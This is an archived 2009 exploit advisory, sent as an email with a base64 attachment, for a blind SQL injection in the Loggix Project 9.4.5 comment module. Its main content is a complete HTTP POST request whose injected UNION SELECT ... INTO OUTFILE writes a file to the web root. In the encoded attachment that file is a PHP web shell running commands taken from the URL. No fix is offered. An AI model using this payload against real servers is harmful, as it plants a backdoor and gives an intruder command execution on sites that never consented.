TUCoPS :: HP Unsorted L

TUCoPS :: HP Unsorted L :: va3131.htm
Loggix Project 9.4.5 Blind SQL Injection
Loggix Project 9.4.5 Blind SQL Injection Loggix Project 9.4.5 Blind SQL Injection

--001636c5b6dae717cb0467344dd1
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Loggix Project
[+] Version: 9.4.5
[+] Website: http://loggix.gotdns.org 

[+] Bugs: [A] Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 10 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: modules/comment/post.php

This bug allows a guest to execute arbitrary
queries.


*************************************************

[+] Code


- [A] Blind SQL Injection

POST /path/modules/comment/post.php HTTP/1.1\r\n
Host: site\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 177\r\n
\r\n
title=title&comment=comment&user_name=user&user_pass=password&parent_key=key&refer_id=-1'
UNION ALL SELECT '' INTO OUTFILE
'/var/www/htdocs/rce.php


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

--001636c5b6dae717cb0467344dd1
Content-Type: text/plain; charset=US-ASCII; 
	name="Loggix Project 9.4.5 Blind SQL Injection-10042009.txt"
Content-Disposition: attachment; 
	filename="Loggix Project 9.4.5 Blind SQL Injection-10042009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_ftczf80m0

KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBMb2dnaXggUHJvamVjdApbK10gVmVyc2lvbjogOS40LjUKWytdIFdlYnNpdGU6
IGh0dHA6Ly9sb2dnaXguZ290ZG5zLm9yZwoKWytdIEJ1Z3M6IFtBXSBCbGluZCBTUUwgSW5qZWN0
aW9uCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERhdGU6IDEwIEFwciAyMDA5CgpbK10g
RGlzY292ZXJlZCBieTogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIEF1dGhvcjog
U2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIENvbnRhY3Q6IGUtbWFpbDogZHJvc29w
aGlsYXh4eEBnbWFpbC5jb20KCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqCgpbK10gTWVudQoKMSkgQnVncwoyKSBDb2RlCjMpIEZpeAoKCioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKClsrXSBCdWdzCgoKLSBb
QV0gQmxpbmQgU1FMIEluamVjdGlvbgoKWy1dIFJpc2s6IG1lZGl1bQpbLV0gUmVxdWlzaXRlczog
bWFnaWNfcXVvdGVzX2dwYyA9IG9mZgpbLV0gRmlsZSBhZmZlY3RlZDogbW9kdWxlcy9jb21tZW50
L3Bvc3QucGhwCgpUaGlzIGJ1ZyBhbGxvd3MgYSBndWVzdCB0byBleGVjdXRlIGFyYml0cmFyeQpx
dWVyaWVzLgoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioKClsrXSBDb2RlCgoKLSBbQV0gQmxpbmQgU1FMIEluamVjdGlvbgoKUE9TVCAvcGF0aC9tb2R1
bGVzL2NvbW1lbnQvcG9zdC5waHAgSFRUUC8xLjFcclxuCkhvc3Q6IHNpdGVcclxuCktlZXAtQWxp
dmU6IDMwMFxyXG4KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZVxyXG4KQ29udGVudC1UeXBlOiBhcHBs
aWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWRcclxuCkNvbnRlbnQtTGVuZ3RoOiAxNzdcclxu
ClxyXG4KdGl0bGU9dGl0bGUmY29tbWVudD1jb21tZW50JnVzZXJfbmFtZT11c2VyJnVzZXJfcGFz
cz1wYXNzd29yZCZwYXJlbnRfa2V5PWtleSZyZWZlcl9pZD0tMScgVU5JT04gQUxMIFNFTEVDVCAn
PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+JyBJTlRPIE9VVEZJTEUgJy92YXIvd3d3L2h0
ZG9jcy9yY2UucGhwCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKgoKWytdIEZpeAoKTm8gZml4LgoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKio--001636c5b6dae717cb0467344dd1--